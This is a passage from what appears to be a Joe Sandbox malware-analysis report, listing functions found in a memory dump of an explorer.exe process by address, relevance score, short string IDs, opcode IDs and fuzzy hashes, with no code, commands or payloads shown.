                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.1784824065.00007FF887C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ff887c60000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: /B$/B$/B$/B
                                                • API String ID: 0-2403987392
                                                • Opcode ID: 69de98167d23011e8b74cac8a66a687a5bd2848bab5bb4dcb12c90d2ebdd0c17
                                                • Instruction ID: 31c6035e64907ec1e3f04d42dd74e2ccf55180882a9f83dc0f35315480e40ea8
                                                • Opcode Fuzzy Hash: 69de98167d23011e8b74cac8a66a687a5bd2848bab5bb4dcb12c90d2ebdd0c17
                                                • Instruction Fuzzy Hash: 23024970918A198FEB95EB68C899BECB7B2FF58300F5040E9D41DD3296DE386981CF41
                                                Function 00007FF887C6C279 Relevance: 4.0, Strings: 3, Instructions: 285COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.1784824065.00007FF887C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ff887c60000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 6B$L$L
                                                • API String ID: 0-3737499674
                                                • Opcode ID: 7cadaaf6840ae2295acec89a383475b199ce2d80e11d230043b672dc6e88e339
                                                • Instruction ID: 49f8c2d97f4a3c68d71d64d12d1c50d6e5520999906e0a34a7654c3080ca8bed
                                                • Opcode Fuzzy Hash: 7cadaaf6840ae2295acec89a383475b199ce2d80e11d230043b672dc6e88e339
                                                • Instruction Fuzzy Hash: 6FA1B870A08A5C8FDF98EF58D895BA8B7F2FF69301F1045A9D00DE7295CB35A981CB00
                                                Function 00007FF887C6AD6B Relevance: 2.8, Strings: 2, Instructions: 346COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.1784824065.00007FF887C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ff887c60000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: r6B$r6B
                                                • API String ID: 0-2860294223
                                                • Opcode ID: 41ae2ca4ac8ea2234bcb6a0b46f4e40f397dd5639d4de128f798dd051ee05081
                                                • Instruction ID: 4a5986ed05873bc22aadba78557d3d3cf76c67fa9922809ef3e5aaeb1deac3cc
                                                • Opcode Fuzzy Hash: 41ae2ca4ac8ea2234bcb6a0b46f4e40f397dd5639d4de128f798dd051ee05081
                                                • Instruction Fuzzy Hash: 9DD16B70D586199FEB0DDF68C094ABCBBB2FF59344F2044BEC45AD7282DA396942CB41
                                                Function 00007FF887C7021C Relevance: 2.8, Strings: 2, Instructions: 253COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.1784824065.00007FF887C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ff887c60000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: r6B$r6B
                                                • API String ID: 0-2860294223
                                                • Opcode ID: 981abb2164a71ad1bd305d485abde131db70aa7b0a5ec3b5380fb6584829e296
                                                • Instruction ID: b0ee39af1b72c6a30b79116a261e55f2f45c62cc7db2021b1e48229346a86750
                                                • Opcode Fuzzy Hash: 981abb2164a71ad1bd305d485abde131db70aa7b0a5ec3b5380fb6584829e296
                                                • Instruction Fuzzy Hash: F291B030A48B858FE765DB28C091669B7F2FF55340F5449BEC09AC7A96DE38F881C741
                                                Function 00007FF887C616C5 Relevance: 2.6, Strings: 2, Instructions: 115COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.1784824065.00007FF887C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ff887c60000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: N_H$HBL
                                                • API String ID: 0-684199934
                                                • Opcode ID: 821847e0698864809a00608e2f263a62cd7b1ca38e537cb0f7f33539228bce55
                                                • Instruction ID: f318e686bbe39243fa61288f94743e9a1f9545916b96f45f0628570ef35bdfec
                                                • Opcode Fuzzy Hash: 821847e0698864809a00608e2f263a62cd7b1ca38e537cb0f7f33539228bce55
                                                • Instruction Fuzzy Hash: A141AB71C5864A9FEB44EBA4D8566FDBBB2FF45341F0401BAD009E7192DB386A44CB82
                                                Function 00007FF887C6D00B Relevance: 2.6, Strings: 2, Instructions: 109COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.1784824065.00007FF887C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ff887c60000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 8\L${z}
                                                • API String ID: 0-139024292
                                                • Opcode ID: cf0388d67a1126725d21b54be32c92dd96c9b4d1622926ab2560006c1e3f3a85
                                                • Instruction ID: c5ec541263c89312f1e8ef214c71fc06e771157e50e3e5f49f6bc51711d373c7
                                                • Opcode Fuzzy Hash: cf0388d67a1126725d21b54be32c92dd96c9b4d1622926ab2560006c1e3f3a85
                                                • Instruction Fuzzy Hash: E931EA3294C94A9FEB54A668E8956ED77F2FFD6360F04017ED04AC7182EE68B842C750
                                                Function 00007FF887C6CCEE Relevance: 2.6, Strings: 2, Instructions: 97COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.1784824065.00007FF887C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ff887c60000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (3K$r6B
                                                • API String ID: 0-2051520653
                                                • Opcode ID: f090d27e50304f3386a96a76aec7c920ceed473672f8b88c9a84b922400ae7b9
                                                • Instruction ID: 81dbd97c1c3f880d84b81ea7046875d74b070f1cf5719fb6951c6bd143cb7117
                                                • Opcode Fuzzy Hash: f090d27e50304f3386a96a76aec7c920ceed473672f8b88c9a84b922400ae7b9
                                                • Instruction Fuzzy Hash: 0A31A374E5894D8FDF94EBACD899AAD7BF2FF59340F40016AD109D72A1DA38B841CB40
                                                Function 00007FF887C616E0 Relevance: 2.6, Strings: 2, Instructions: 91COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.1784824065.00007FF887C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ff887c60000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: N_H$HBL
                                                • API String ID: 0-684199934
                                                • Opcode ID: 3d00509120288070f2edddaaf6901fc1d26ca6c7763404430ee1fe96a2c0fa31
                                                • Instruction ID: 45f58ee7398b7ee6c615d0d8098c78690890bb31f1ac6bc56c9d37b29beaca65
                                                • Opcode Fuzzy Hash: 3d00509120288070f2edddaaf6901fc1d26ca6c7763404430ee1fe96a2c0fa31
                                                • Instruction Fuzzy Hash: 87315870C18A4D9FEB84EBA8D8557EDB6B2FF59741F4001BAD009E3196DB386A40CB41
                                                Function 00007FF887C6D065 Relevance: 2.6, Strings: 2, Instructions: 90COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.1784824065.00007FF887C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ff887c60000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: r6B$r6B
                                                • API String ID: 0-2860294223
                                                • Opcode ID: 2b35a7fb935f096541fcfac41488795d66e88eeca08cd5b9c3151b1ca78f1074
                                                • Instruction ID: 3879a9b42d49f8f5bbf15e8a6b24198b54915fa4540f52ab35a9b64c96aa3e25
                                                • Opcode Fuzzy Hash: 2b35a7fb935f096541fcfac41488795d66e88eeca08cd5b9c3151b1ca78f1074
                                                • Instruction Fuzzy Hash: E2218072F5C9195BAB98E55CE8915FDB3F3FB88A60B14027ED00DD3286DD2478028381
                                                Function 00007FF887C7058C Relevance: 2.6, Strings: 2, Instructions: 80COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.1784824065.00007FF887C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ff887c60000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $r6B
                                                • API String ID: 0-2315467569
                                                • Opcode ID: d60a39fe4f05401b120d26481239ad5cf7bf54e9420e2c9e97267c7e8895fb9e
                                                • Instruction ID: eed4f521468ac71dd3db0a85350c46ccb5c4a65a80a75c7a356eb9e08931dadc
                                                • Opcode Fuzzy Hash: d60a39fe4f05401b120d26481239ad5cf7bf54e9420e2c9e97267c7e8895fb9e
                                                • Instruction Fuzzy Hash: 8C217A71E5890D9FDB48DB9CD8506ECB7B2FF99340F4041BAD419E3282DE386842CB40
                                                Function 00007FF887C6A796 Relevance: 2.6, Strings: 2, Instructions: 66COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.1784824065.00007FF887C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ff887c60000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $r6B
                                                • API String ID: 0-2315467569
                                                • Opcode ID: 7de8f4fbd9c73027a13a6988d558d3eb2f6e87fa60696f47575c969d23567273
                                                • Instruction ID: c5fc8638016c5c3a71e09afa8981e76383ba6d3624b3213d18d34c5b6158173f
                                                • Opcode Fuzzy Hash: 7de8f4fbd9c73027a13a6988d558d3eb2f6e87fa60696f47575c969d23567273
                                                • Instruction Fuzzy Hash: 6E213871D9850AAEEB589A98D4946FEB7B2FF48741F00417AC40DD3186DE283842DB81
                                                Function 00007FF887C70B05 Relevance: 1.5, Strings: 1, Instructions: 232COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.1784824065.00007FF887C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ff887c60000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: r6B
                                                • API String ID: 0-2624010786
                                                • Opcode ID: 1e4377d8db67911e01eb637b55679ebb2807f3950ac22375c39787f42f8379ff
                                                • Instruction ID: 100716c98fa862a09a81e8b6fe31b07565450e0e1d3472ebfd906464735960b2
                                                • Opcode Fuzzy Hash: 1e4377d8db67911e01eb637b55679ebb2807f3950ac22375c39787f42f8379ff
                                                • Instruction Fuzzy Hash: FBA14A34D0861D9FDB49CF58C494AACB7B1FF69344F1084AED42ED7392CA39A982CB15
                                                Function 00007FF887C708BA Relevance: 1.5, Strings: 1, Instructions: 215COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.1784824065.00007FF887C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ff887c60000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: b4B
                                                • API String ID: 0-3849415641
                                                • Opcode ID: be3ae81b305745b6828741fb6104f73396c40d8a6a801b86bcd6f34051a47a5c
                                                • Instruction ID: 277f50db40026d40e0ef3ac88290a6047d74db0dbe5154e2155cc0db893cd6fb
                                                • Opcode Fuzzy Hash: be3ae81b305745b6828741fb6104f73396c40d8a6a801b86bcd6f34051a47a5c
                                                • Instruction Fuzzy Hash: A4513730A9C6994FF74D9A6CD8522BC77E1FB46399F1401BEC4ABD7183D9186883C781
                                                Function 00007FF887C6AB5A Relevance: 1.5, Strings: 1, Instructions: 215COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.1784824065.00007FF887C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ff887c60000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: b4B
                                                • API String ID: 0-3849415641
                                                • Opcode ID: 68ff306419929ce6fc04c73f83ef8845492c18576705759d69630728d7bb3499
                                                • Instruction ID: 7da5aec4c460ecada495abfdc7d55c2f9bf52eb09f923baca7f80bafe0625b48
                                                • Opcode Fuzzy Hash: 68ff306419929ce6fc04c73f83ef8845492c18576705759d69630728d7bb3499
                                                • Instruction Fuzzy Hash: 17510531A5C6995FE70D9A68D8912BD7BE2FB46358F2401BDC49BC7283D91AB843C381
                                                Function 00007FF887C60C36 Relevance: 1.4, Strings: 1, Instructions: 195COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.1784824065.00007FF887C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ff887c60000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 0DL
                                                • API String ID: 0-3174716889
                                                • Opcode ID: cb7ec33d7cf2fab04889667a48948d717c24f0cdf11c11d35f0ee23eaae169f2
                                                • Instruction ID: 58be074a506b8578b5683f149144db072893f1c44ff37b9ab1bbf0095c209ed9
                                                • Opcode Fuzzy Hash: cb7ec33d7cf2fab04889667a48948d717c24f0cdf11c11d35f0ee23eaae169f2
                                                • Instruction Fuzzy Hash: 1B71C670D58A198FDB94EB68D894BACB7F2FF59340F5041AAD00DE7292DA34A9C1CF01
                                                Function 00007FF887C65FC0 Relevance: 1.4, Strings: 1, Instructions: 166COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.1784824065.00007FF887C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ff887c60000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: M_I
                                                • API String ID: 0-1631496010
                                                • Opcode ID: 527be21c56a6bc7912795941230a2e956c7f56064c5f66f457fc50dd420862eb
                                                • Instruction ID: 1eefbec50b29c7e5fdc9e9609f642554cfcb486d474a76c161528ad11e1d5092
                                                • Opcode Fuzzy Hash: 527be21c56a6bc7912795941230a2e956c7f56064c5f66f457fc50dd420862eb
                                                • Instruction Fuzzy Hash: 8851D371D4D64A8FE744ABA8E4902FDBBF2FF02350F4402BED04AA7283DE286945C745
                                                Function 00007FF887C61A81 Relevance: 1.4, Strings: 1, Instructions: 122COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.1784824065.00007FF887C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ff887c60000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: H;H
                                                • API String ID: 0-2930457148
                                                • Opcode ID: 517b8caad787b70c4bd2874fca5a318590782eddd460ce10ec62bac1388fa36e
                                                • Instruction ID: 6dab85dcce982a00887fc22d13475259a380ea117df7c275e12da97817ec52ff
                                                • Opcode Fuzzy Hash: 517b8caad787b70c4bd2874fca5a318590782eddd460ce10ec62bac1388fa36e
                                                • Instruction Fuzzy Hash: 2B41FC70D48A5D9FDB94DFA8D499BADBBF1FF68301F04006AD409E7291DB74A881CB40
                                                Function 00007FF887C61AA0 Relevance: 1.4, Strings: 1, Instructions: 121COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.1784824065.00007FF887C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ff887c60000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: H;H
                                                • API String ID: 0-2930457148
                                                • Opcode ID: aac8b7998fcf552e4ef311b68d799abb8a1118de4442a0e925efc792f6512783
                                                • Instruction ID: e13270e1f9a991fefd4075643ed8262169229ff2f1a6a20087b6ed38eca27be3
                                                • Opcode Fuzzy Hash: aac8b7998fcf552e4ef311b68d799abb8a1118de4442a0e925efc792f6512783
                                                • Instruction Fuzzy Hash: DD41E570D08A5D9FDF94EBA8D499BADBBF1FF68301F04006AD409E7295DB74A881CB40
                                                Function 00007FF887C6CCB6 Relevance: 1.4, Strings: 1, Instructions: 103COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.1784824065.00007FF887C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ff887c60000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: r6B
                                                • API String ID: 0-2624010786
                                                • Opcode ID: 24954e2407bd13df6b73490990eb73d115e2a78f07a260d38a03d285746d1bd3
                                                • Instruction ID: 9393e7cc418f6f42cc8c611c01e3c5ab54285a080841d4fcea577a746d4b1cf3
                                                • Opcode Fuzzy Hash: 24954e2407bd13df6b73490990eb73d115e2a78f07a260d38a03d285746d1bd3
                                                • Instruction Fuzzy Hash: 6731C771A1891D9FDF88EB9CD895EADBBF1FF99340F00016AD10DD72A1DA38A841CB40
                                                Function 00007FF887C6CD00 Relevance: 1.3, Strings: 1, Instructions: 80COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.1784824065.00007FF887C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ff887c60000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: r6B
                                                • API String ID: 0-2624010786
                                                • Opcode ID: 3638509ca2c6209b88d809871fa5a2fb0475a94c43b37da602fbb9b64aa29845
                                                • Instruction ID: 16c36525524118076a620ce9d8aa1af4b263e612c583ecc210ce35be9e6b2eff
                                                • Opcode Fuzzy Hash: 3638509ca2c6209b88d809871fa5a2fb0475a94c43b37da602fbb9b64aa29845
                                                • Instruction Fuzzy Hash: 06219670E1491D8FDF84EBACC495EADBBF1FF59340B41406AD51DE7261DA38A841CB40
                                                Function 00007FF887C692A2 Relevance: 1.3, Strings: 1, Instructions: 77COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.1784824065.00007FF887C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ff887c60000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: r6B
                                                • API String ID: 0-2624010786
                                                • Opcode ID: 371704b5d9bc6042d9d85e75bb18ba8bfc78c737fe06900c03b326b091174f5e
                                                • Instruction ID: 0b08d6e5e84ad89fae5c19baf1c602355c9b441ff0224416d49b7227daa759fb
                                                • Opcode Fuzzy Hash: 371704b5d9bc6042d9d85e75bb18ba8bfc78c737fe06900c03b326b091174f5e
                                                • Instruction Fuzzy Hash: 0D112132FAC9195B9B98E65CE8915BCB3E3FF99BA0B14427DD40ED3282DD1578028681
                                                Function 00007FF887C69B08 Relevance: 1.3, Strings: 1, Instructions: 55COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.1784824065.00007FF887C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ff887c60000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: r6B
                                                • API String ID: 0-2624010786
                                                • Opcode ID: 6802b8f44b7769fa817fd8c924511abae402af23fa5eb8d121462a80b7479c6c
                                                • Instruction ID: 6308bafbf94ec3e472d7d20a9edde7deaf7d7fb007364b3db71022e7e254e8a6
                                                • Opcode Fuzzy Hash: 6802b8f44b7769fa817fd8c924511abae402af23fa5eb8d121462a80b7479c6c
                                                • Instruction Fuzzy Hash: B201FE61E5CD4A9FD7D8EE68C4953B973E1FF64745B40427EC80EC71C2EE14A8058741
                                                Function 00007FF887C69B6A Relevance: 1.3, Strings: 1, Instructions: 54COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.1784824065.00007FF887C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ff887c60000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: r6B
                                                • API String ID: 0-2624010786
                                                • Opcode ID: 5d1b5ae4696257a7511fa5b54f7d64a009bff735f633178dacf54bf061361684
                                                • Instruction ID: ad6b4824e84d9195764b832706cdaeb947d714f6f747746cb9b7fa53c8ca87bc
                                                • Opcode Fuzzy Hash: 5d1b5ae4696257a7511fa5b54f7d64a009bff735f633178dacf54bf061361684
                                                • Instruction Fuzzy Hash: CF01B561B58E4E9FD788EE68C4953F9B3E1FF64341B00417EC80EC3692EE24A4058741
                                                Function 00007FF887C6642C Relevance: 1.3, Strings: 1, Instructions: 43COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.1784824065.00007FF887C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ff887c60000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 8eL
                                                • API String ID: 0-2915619072
                                                • Opcode ID: e9c8691b0098c2d19a567465d2901634218dbbb161e3f5b5de620ea729e01775
                                                • Instruction ID: 08ead22f693b659f01f44d7e4d00f33c4d0a8010499a8be639a944abc09e44ea
                                                • Opcode Fuzzy Hash: e9c8691b0098c2d19a567465d2901634218dbbb161e3f5b5de620ea729e01775
                                                • Instruction Fuzzy Hash: 53F0A975918A0D8FEB44EF9CE8806EEB7B5FB88314F40026AE80DD3285CB34A9158781
                                                Function 00007FF887C6661B Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.1784824065.00007FF887C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ff887c60000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: XE
                                                • API String ID: 0-1903603036
                                                • Opcode ID: 294256b78cdc04fac0de7e775246c3fdd69551ce4a9e372d46bf187cec8b15ff
                                                • Instruction ID: 6f4c8c892a62f70a3393868eb0d56af03ebd61fb25423aa5803de10335e8f255
                                                • Opcode Fuzzy Hash: 294256b78cdc04fac0de7e775246c3fdd69551ce4a9e372d46bf187cec8b15ff
                                                • Instruction Fuzzy Hash: 49F0A074D48A4D8EEB81EB68D48C2ECBFF1FF44340F4004B9D409E3091EA34A584CB02
                                                Function 00007FF887C631AB Relevance: .4, Instructions: 366COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.1784824065.00007FF887C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ff887c60000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3bb6d071989d04ac3baa1be1e47cee423b0cc05346ef5cdc879742b541d0179d
                                                • Instruction ID: 7f0fe5b3390f369e80e2284b3cd1aee6ce7f31d8cc518240dc87755b6620ccc2
                                                • Opcode Fuzzy Hash: 3bb6d071989d04ac3baa1be1e47cee423b0cc05346ef5cdc879742b541d0179d
                                                • Instruction Fuzzy Hash: E3D12770D18A598FEB98DB68C8A47BCB7B2FF59740F1441BDD00DE3292DA386985CB41
                                                Function 00007FF887C631B0 Relevance: .3, Instructions: 296COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.1784824065.00007FF887C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ff887c60000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e2f302a3080a080986f6c2553e565ea38a14cffb2144f63a3e10c3cb410c1ab0
                                                • Instruction ID: d1616f64264e7a6ba62a62fd4633d3a3d24872d0f11dfffa7833a121715a8938
                                                • Opcode Fuzzy Hash: e2f302a3080a080986f6c2553e565ea38a14cffb2144f63a3e10c3cb410c1ab0
                                                • Instruction Fuzzy Hash: 1DB11871D18A598FEB98DB68C8A47ACB7B2FF59344F1441BDC00DD7292DE386984CB41
                                                Function 00007FF887C6F699 Relevance: .3, Instructions: 294COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.1784824065.00007FF887C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ff887c60000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 600a1cf5d18a65d8d45f93bbea2e643047c89fa157d2c8f885560107f0e2133b
                                                • Instruction ID: 6e23ade98f1c482783ecf6a01ae7580d1c2220655d1a073eaf7296f1a99b3d67
                                                • Opcode Fuzzy Hash: 600a1cf5d18a65d8d45f93bbea2e643047c89fa157d2c8f885560107f0e2133b
                                                • Instruction Fuzzy Hash: 82A18B31948A4A8FEB99EB68D4916ED77F2FF59340F50057DE00ED7282DB39A841CB41
                                                Function 00007FF887C6B62D Relevance: .3, Instructions: 281COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.1784824065.00007FF887C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ff887c60000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8bcc8240450cceea0f4406b265b2520ca842de3293fff278da7eb206b1a81b82
                                                • Instruction ID: c67664f250e00c231554b895842454f3f2a27f7c098279d2b1194e7121762a1e
                                                • Opcode Fuzzy Hash: 8bcc8240450cceea0f4406b265b2520ca842de3293fff278da7eb206b1a81b82
                                                • Instruction Fuzzy Hash: A5A17030A58B068FE359DF28D1D45AA7BF2FF44344B60497DC48AC7696DB39B882CB41
                                                Function 00007FF887C635C0 Relevance: .2, Instructions: 234COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.1784824065.00007FF887C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ff887c60000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a8979870b8972d1db3dc0906e0104b842d97e53227a3a1dbe41be24e4c1631ff
                                                • Instruction ID: 0b93c283398273cac97e0fdc4964738050b18eb65bd349b855f4ce5bc6a357fe
                                                • Opcode Fuzzy Hash: a8979870b8972d1db3dc0906e0104b842d97e53227a3a1dbe41be24e4c1631ff
                                                • Instruction Fuzzy Hash: 68911070D1865A8FDB58DFA4C494AEDBBB2FF59301F60017DD00EA7292CB39A981CB51
                                                Function 00007FF887C6149A Relevance: .2, Instructions: 215COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.1784824065.00007FF887C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ff887c60000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d595c6d8163acbf9f18e822314f4e49940779622b6dedb98d97c6b5003a6c140
                                                • Instruction ID: de794ff5465a4269cf24f57aebea2a4ff212e7e9895f17ed93e501eb02a1efa4
                                                • Opcode Fuzzy Hash: d595c6d8163acbf9f18e822314f4e49940779622b6dedb98d97c6b5003a6c140
                                                • Instruction Fuzzy Hash: EE51D631C8C94E4BEB6596E8D8412FCBBB2BF56392F14027ED45AD70D7EA18340AC691
